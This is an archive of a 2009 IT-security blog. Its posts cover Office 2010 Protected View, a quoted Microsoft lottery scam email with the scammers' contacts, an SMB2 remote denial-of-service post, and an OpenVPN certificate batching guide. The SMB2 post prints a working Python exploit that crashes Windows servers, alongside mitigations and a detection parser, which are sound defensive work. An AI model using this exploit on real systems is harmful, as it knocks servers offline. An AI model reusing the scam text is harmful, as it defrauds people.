Saturday, September 26, 2009

Office 2010 protects documents from untrusted sources like the internet

Typically, when you open something in MS Word or Excel straight from a download, all components within that document, such as internet links, scripts or procedures, may be enabled (depending on your security levels).

One feature I really like in Office 2010 is that the software “knows” which Office documents were downloaded from the internet and marks them as “public/unsafe”.

Documents opened in Protected View (as it’s called) are prevented from executing malicious code by sandboxing the application, i.e. isolating its process.

When launching a document in this mode, Task Manager shows two winword.exe processes (the Microsoft Word executable binary). I assume one of them is the original application running in normal mode, and the one with the smaller memory footprint is probably the sandboxed one (reduced functionality).


Once you’ve accepted to edit (see the ENABLE EDITING button at the top right), it runs the process in normal view and the so-called sandboxed version is no longer in memory.


Protected view prevents application attacks that attempt to inject and run code by enabling features such as ASLR, DEP and /GH.

I like this. It helps users be protected automatically: view the content first (in case curiosity gets the better of you) and then decide to “enable” the document in normal view.

Good stuff!

Have a wonderful weekend.

Microsoft Internet Lottery Scam

These guys are getting smarter. To avoid being tagged as spam, they send the main content body as a Word document, so it sailed past the Hotmail antispam service and right into my inbox. Anyway, just sharing with you how ridiculously funny this is.

To top that, it comes from a yahoo address: evansokoli8@yahoo.com 

MICROSOFT INTERNET LOTTERY AWARD 2009

MORLEY HOUSE, 26-30 HOLBORN VIADUCTS,

LONDON EC1A 2BP.U.K.

Dear Email Owner,

We are pleased to inform you that you have won a prize money of GBP800,000.00 British Pounds (Eight Hundred Thousand British Pounds) Only for the email users this 2009 Prize promotion which is organized by MICROSOFT, We Collects all the email addresses of people worldwide, that are active online this 2009, among the millions that subscribed to MICROSOFT, HOTMAIL, YAHOO, GMAIL and few from other e-mail providers, 12 people are selected monthly to benefit from this promotion and you are one of the Selected Winners this month of SEPTEMBER 2009.

Your email address has therefore been approved to claim a total sum of (GBP800,000.00 BRITISH POUNDS) in cash.

FILE NUMBER: MIC/903/KPC/0108308/09.

1. Your Full Names:

2. Your Country:

3. Telephone Number:

4. Occupation:

5. Age:

To file for your claim, you are advised to contact our appointed paying bank below without any further delay, because your payment file has been forwarded to them for urgent payment of your winning prize, contact MR. STEPHEN HESTER Below as soon as you receive this massage and remember to forward him the Above File Number And Information’s which will help him to know that you are the rightful beneficiary, then he will instruction you on what to do next to receive your fund.

PAYMENT BANK CONTACT INFORMATION:

BANK NAME: ROYAL BANK OF SCOTLAND LONDON-UK

CONTACT PERSON: MR. STEPHEN HESTER

FOREIGN REMITTANCE DEPARTMENT

Tel: +44-703-174-7509

Fax: +44-870-471-8189

Tel/Fax: +44- 844-774-4940

Contact Email: stephenhester@mycin.net

WARNING: Any Prize that is not claim within 29 working days from the day you where notified will turn void and invalid, and You are advised to keep your winning information confidential until your claims are processed and your fund remitted to your bank account. This is part of our precautionary measure to avoid double claiming and unwarranted abuse of this program by some unscrupulous elements.

For more clarifications, please contact MR. JOHN WILLIAMS through his contact email address: johnwilliams63@live.co.uk

Congratulations once again,

Mr. Evans Okoli.

Head Customer care Service

Microsoft Promotion Team

Our special thanks and gratitude to Chairman CEO MICROSOFT Bill Gates and his associates we wish you the best of luck. Thank you for being part of our promotional award program and commemorative Anniversary.

© Copyright 2009 Microsoft Lottery promotion All Right Reserve

Sunday, September 13, 2009

Forefront TMG NIS protects against SMB2.0 attacks


Microsoft has added protection against exploits targeting a vulnerability in the Server Message Block (SMB) implementation in mere hours. However, only customers running the Forefront TMG Network Inspection System can breathe easy. The Redmond-based company said that the protection against the critical zero-day vulnerability in SMB 2.0 was the first 0-day signature release ever introduced to Forefront TMG NIS, according to Avi Ben-Menahem, Group Manager, Network Inspection System.
“In a matter of hours we completed root-cause analysis, signature development, testing and publishing of a new signature snapshot. During this process, which is driven by the Microsoft Malware Protection Center (MMPC), the team was able to demonstrate the agility of the core NIS technology and exercise the technologies and tools built over time to release a signature for the Vuln:Win/SMB2.Srv2.DoS!2009-3103 vulnerability in just a few hours,” Ben-Menahem revealed.
Want to try it out? Download here

Wednesday, September 9, 2009

Windows SMB2 'SRV2.SYS' Remote Denial of Service Exploit (and screen shots on Windows 2008 SP2)

There’s a simple exploit for the SMB2 protocol (implemented in the newer Microsoft OSes) that can easily BSOD a Windows server or client remotely. SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it is used to identify the SMB dialect that will be used for further communication.

POC

Tried and tested this on Windows 2008 R2 x32 on VirtualBox and it crashed that bad boy the instant I pressed enter. At the time of posting, that same server, which is my AD server (meant for a security seminar in Penang), just won’t boot anymore… F@!@@!!!… and LOL at the same time.

I had to boot with “Last known good configuration” and that brought the DC up again.

The exploit was done on Debian.


Also tried it on my x64 Windows 7 RTM Build 7600 (also using SMB 2.0) but nothing happened. This means Microsoft was informed of the bug and fixed it in the RTM build.

All credits to Laurent Gaffié

Here’s the exploit code. You need to have File and Print Sharing enabled on Windows as well, and of course the firewall must allow File and Print Sharing from the network(s) you are on.

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Be responsible, exploit test machines only :D please

Mitigation techniques:

1) Disable SMB / File and Print Sharing (this is tough… I know)
2) Enable a host-level IDS to detect this signature, or write your own signature.
3) Enable firewalls to block SMB traffic from unknown sources (with the hope that no one does this in the so-called trusted network)
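As an added example for mitigation 2 (not code from the original post or from the exploit’s author): a parser for the NetBIOS-framed SMB1 header that flags a NEGOTIATE request whose Process ID High field is non-zero, the malformed field the comment in the exploit above describes. The header layout follows MS-CIFS; the two sample requests are constructed here for the check and are not captures.

```python
import struct

# SMB1 framing constants (MS-CIFS). The crash described above is triggered
# by a NEGOTIATE request whose Process ID High header field is not zero.
NBSS_SESSION_MESSAGE = 0x00
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72


def parse_smb1_header(packet):
    """Return the SMB1 header fields of a NetBIOS-framed request, or None
    when the bytes are not a well-formed SMB1 session message."""
    if len(packet) < 36 or packet[0] != NBSS_SESSION_MESSAGE:
        return None
    nbss_len = int.from_bytes(packet[1:4], "big")
    if nbss_len != len(packet) - 4:
        return None  # framing length disagrees with the payload we have
    hdr = packet[4:36]
    if hdr[:4] != SMB_MAGIC:
        return None
    command, status, flags, flags2, pid_high = struct.unpack("<BIBHH", hdr[4:14])
    tid, pid_low, uid, mid = struct.unpack("<HHHH", hdr[24:32])
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "pid_high": pid_high, "pid_low": pid_low, "tid": tid, "uid": uid, "mid": mid}


def negotiate_alert(packet):
    """Detection rule: legitimate clients send 0x0000 in Process ID High of a
    NEGOTIATE request, so a non-zero value is the signature of the malformed
    request covered by Microsoft advisory 975497. Returns an alert string or None."""
    fields = parse_smb1_header(packet)
    if fields is None or fields["command"] != SMB_COM_NEGOTIATE:
        return None
    if fields["pid_high"] != 0:
        return "SMB NEGOTIATE with non-zero Process ID High 0x%04x" % fields["pid_high"]
    return None


def _sample_negotiate(pid_high_bytes):
    """Constructed sample (not a capture): a NEGOTIATE request offering two
    dialects, with the Process ID High field supplied by the caller."""
    header = (SMB_MAGIC + bytes([SMB_COM_NEGOTIATE]) + b"\x00\x00\x00\x00"   # command, status
              + b"\x18" + b"\x53\xc8" + pid_high_bytes + b"\x00" * 8          # flags, flags2, PIDHigh, signature
              + b"\x00\x00" + b"\xff\xff" + b"\xff\xfe" + b"\x00\x00\x00\x00")  # reserved, TID, PID, UID, MID
    dialects = b"\x02NT LM 0.12\x00\x02SMB 2.002\x00"
    payload = header + b"\x00" + struct.pack("<H", len(dialects)) + dialects  # WordCount, ByteCount
    return bytes([NBSS_SESSION_MESSAGE]) + len(payload).to_bytes(3, "big") + payload


NORMAL_NEGOTIATE = _sample_negotiate(b"\x00\x00")     # what a real client sends
ANOMALOUS_NEGOTIATE = _sample_negotiate(b"\x00\x26")  # the "&" from the exploit comment
```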

The following platforms are vulnerable (I didn’t test them personally though):

Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta

And to add from my test, Windows 2008 with SP2.

Microsoft posted this advisory, but basically it doesn’t fix anything; it just gives workarounds that disable SMB(2): http://www.microsoft.com/technet/security/advisory/975497.mspx

Friday, September 4, 2009

openVPN easyrsa batch em "build-key"

We were deploying a solution for our customer, Pizza Hut/KFC Malaysia, which deploys pfSense as a VPN gateway and firewall to a little under 300 outlets in Malaysia.

Each outlet has a unique “storeID”, which is then required to run the OpenVPN daemon in the background and fire a connection whenever a layer 2 link is established.

Creating just under 300 certificates using OpenVPN’s (v2.x.x) easyrsa scripts on CentOS clients isn’t fun. So being a lazy ass, I wrote a simple way to help create these files fast!

Assuming you’ve got the whole works with OpenVPN and pfSense sorted. If not, read this great document here. Once you’ve got the server side done on pfSense, you will need to generate more keys for (in this case, Pizza Hut’s) 300 branches’ peer certificates.

Snail factor

  • Build-key prompts, amongst other things, for the commonName or server name each time a certificate is generated

What is needed?

  • To create store certificates automatically, without prompts, using a $variable$ to “insert” the commonName value. This means a certificate will be created as storeID.key, storeID.crt and storeID.csr

How - Conceptually?

  1. Automate the build-key file to disable prompts
  2. Feed a variable into the environment so the system picks up the $variable$, which then becomes both the filename and the commonName

How – Technically

(Assumptions – easyrsa is in /etc/openvpn/easyrsa and keys are in /etc/openvpn/easyrsa/keys. In /easyrsa, you have all the scripts like build-ca, build-key)

Create a file called build_batch in /etc/openvpn/easyrsa with the following lines, and make it executable with chmod +x build_batch

#!/bin/sh

# Usage: ./build_batch <storeID>
# Exports the storeID so openssl.cnf picks it up as commonName_default,
# then runs build-key (patched with -batch below) with that name.
if test $# -ne 1; then
    echo "usage: build_batch <name>"
    exit 1
else
    export KEY_CNAME="$1"
    ./build-key "$1"
fi

Now, edit (nano/vi) the openssl.cnf file in /etc/openvpn/easyrsa and look for the following lines

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

Add a new line like below and save the file.

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

# Add this line below
commonName_default        = $ENV::KEY_CNAME

Now, edit (nano/vi) the build-key script in that same directory. At the end of the openssl req and openssl ca statements, add the -batch argument.

This is how part of the original file looks

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -config $KEY_CONFIG && \

We modify the lines to add -batch as below and save the file

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -batch -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -batch -config $KEY_CONFIG && \

Now you’re ready to run in batch. But before that, load the vars into the environment as below, from /etc/openvpn/easyrsa

source vars

Run a sample like below

./build_batch test01

This will build the test01.crt, test01.csr and test01.key automatically in /etc/openvpn/easyrsa/keys with the commonName test01 also :)

Done.

Now, if you want to do lots of these, use the Excel file below

easy-rsa-linemaker.xls (Excel file)

Use the Excel file (build-cert sheet) to generate script lines (see the Excel sample) so you can copy and paste them into an SSH remote session in the appropriate directory.

Copy up to 50 lines at a time (within the buffer) from the copypaster column and paste them via an SSH session into /etc/openvpn/easyrsa, and it will generate everything without prompting. Quick and easy.
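Added here as an example (not code from the original post or from the easy-rsa project): a Python stand-in for the Excel line-maker sheet that checks each store ID before it becomes a commonName and a file name, skips duplicates and stores that already have a certificate, and emits the build_batch lines as one pasteable script. It assumes the paths from the post; the store list is a constructed sample.

```python
import re
from pathlib import Path

# Paths assumed from the post; adjust for your layout.
EASYRSA_DIR = Path("/etc/openvpn/easyrsa")
KEYS_DIR = EASYRSA_DIR / "keys"

# A store ID becomes the commonName (via $ENV::KEY_CNAME, commonName_max = 64)
# and the basename of storeID.key/.csr/.crt, so allow only characters that are
# safe in both roles and cannot be misread as a shell argument or a path.
STORE_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")


def valid_store_id(store_id):
    return bool(STORE_ID_RE.fullmatch(store_id))


def batch_lines(store_ids, keys_dir=KEYS_DIR):
    """Turn a store list into one './build_batch <id>' line per new store.
    Skips invalid IDs, duplicates and stores whose .crt already exists, and
    returns (lines, skipped), where skipped maps the offending value to a reason."""
    keys_dir = Path(keys_dir)
    lines, skipped, seen = [], {}, set()
    for raw in store_ids:
        sid = raw.strip()  # tolerate CRLF and stray spaces from a spreadsheet export
        if not valid_store_id(sid):
            skipped[raw] = "invalid store id"
        elif sid in seen:
            skipped[sid] = "duplicate"
        elif (keys_dir / f"{sid}.crt").exists():
            skipped[sid] = "certificate already exists"
        else:
            seen.add(sid)
            lines.append(f"./build_batch {sid}")
    return lines, skipped


def batch_script(store_ids, easyrsa_dir=EASYRSA_DIR, keys_dir=KEYS_DIR):
    """Whole script to paste into the SSH session: cd into easy-rsa, load vars
    (the post's 'source vars' step), then run the build lines. Stops on the
    first failure so one bad build does not leave a half-generated batch."""
    lines, skipped = batch_lines(store_ids, keys_dir)
    header = ["#!/bin/bash", "set -e", f"cd {easyrsa_dir}", "source ./vars"]
    return "\n".join(header + lines) + "\n", skipped


# Constructed sample export (not real customer data): CRLF endings, a duplicate,
# an ID with a space, and an empty cell.
SAMPLE_STORE_IDS = ["KL001\r", "KL002\r", "KL001\r", "PJ 003", "", "JB-017\r"]
```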


To remove/revoke certs, do the same but use the Excel’s revoke-cert sheet.


<Ignore the CRL/STR_COPY issues; I don’t have CRLs defined>

If things get badly messed up, just run the command below. Warning: this will remove your CA, server and DH information, which you then need to repopulate inside pfSense.

./clean-all

After clean-all you must recreate all below

./build-ca
./build-key-server
./build-dh

Then re-run the steps above.